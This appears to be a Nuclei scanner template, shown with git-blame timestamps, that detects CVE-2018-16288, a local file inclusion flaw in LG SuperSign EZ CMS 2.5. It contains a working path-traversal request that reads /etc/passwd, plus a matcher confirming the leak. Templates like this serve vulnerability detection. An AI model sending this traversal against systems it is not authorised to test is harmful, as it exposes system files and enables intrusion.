2021-08-12 02:41:00 +00:00
|
|
|
id: CVE-2018-16288
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: LG SuperSign EZ CMS 2.5 - Local File Inclusion
|
|
|
|
author: daffainfo
|
|
|
|
severity: high
|
2022-06-20 16:14:08 +00:00
|
|
|
description: |
|
|
|
|
LG SuperSign CMS 2.5 allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs - aka local file inclusion.
|
2021-08-19 13:59:12 +00:00
|
|
|
reference:
|
2021-08-12 02:41:00 +00:00
|
|
|
- https://www.exploit-db.com/exploits/45440
|
2022-05-17 09:18:12 +00:00
|
|
|
- http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html
|
2022-06-13 18:43:37 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-16288
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 8.6
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2018-16288
|
|
|
|
cwe-id: CWE-200
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: cve,cve2018,lfi,supersign,edb
|
2021-08-12 02:41:00 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-08-12 02:41:00 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-06-13 18:43:37 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/06/13
|